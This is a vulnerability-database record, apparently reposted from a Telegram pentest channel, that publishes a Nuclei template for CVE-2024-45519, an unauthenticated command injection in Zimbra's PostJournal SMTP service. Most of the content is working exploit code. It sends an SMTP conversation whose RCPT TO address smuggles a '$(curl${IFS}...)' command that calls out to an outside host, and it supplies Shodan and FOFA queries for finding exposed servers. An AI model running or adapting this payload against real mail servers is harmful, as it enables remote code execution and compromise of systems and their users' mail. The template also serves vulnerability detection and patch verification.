{"uuid": "f320026c-6323-4ba5-9792-27dc838eb3b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/pt_soft/376", "content": "\ud83c\udf83 CVE-2024-45519 : Zimbra - Remote Command Execution\n\nZimbra - a widely used mail server and collaboration platform\n\nNuclei template:\n\nid: CVE-2024-45519\n\ninfo:\n  name: Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution\n  author: pdresearch,iamnoooob,parthmalhotra,ice3man543\n  severity: critical\n  description: |\n    SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. 
Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system\u2019s integrity and confidentiality.\n  reference:\n    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\n  classification:\n    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*\n  metadata:\n    vendor: synacor\n    product: zimbra_collaboration_suite\n    shodan-query:\n      - http.title:\"zimbra collaboration suite\"\n      - http.title:\"zimbra web client sign in\"\n      - http.favicon.hash:1624375939\n    fofa-query:\n      - title=\"zimbra web client sign in\"\n      - title=\"zimbra collaboration suite\"\n  tags: cve,cve2024,rce,zimbra\n\njavascript:\n  - pre-condition: |\n      isPortOpen(Host,Port);\n    code: |\n      let m = require('nuclei/net');\n      let address = Host+\":\"+Port;\n      let conn;\n      conn=  m.Open('tcp', address)\n      conn.Send('EHLO localhost\\r\\n');\n      conn.RecvString()\n      conn.Send('MAIL FROM: \\r\\n');\n      conn.RecvString()\n      conn.Send('RCPT TO: <\"aabbb$(curl${IFS}'+oast+')\"@mail.domain.com>\\r\\n');\n      conn.RecvString()\n      conn.Send('DATA\\r\\n');\n      conn.RecvString()\n      conn.Send('aaa\\r\\n');\n      conn.RecvString()\n      conn.Send('.\\r\\n');\n      resp = conn.RecvString()\n      conn.Send('QUIT\\r\\n');\n      conn.Close()\n      resp\n    args:\n      Host: \"{{Host}}\"\n      Port: 25\n      oast: \"{{interactsh-url}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        words:\n          - \"message delivered\"\n\nThe vulnerability is fixed in versions 9.0.0 Patch 41 and later, as 
well as in versions 10.0.9 and 10.1.1 and Zimbra 8.8.15 Patch 46 and later\n\n\ud83d\udcbb PoC\n\n#rce #cve #zimbra #poc\n\n\u2708\ufe0f // Pentest HaT \ud83c\udfa9", "creation_timestamp": "2024-10-06T09:04:26.000000Z"}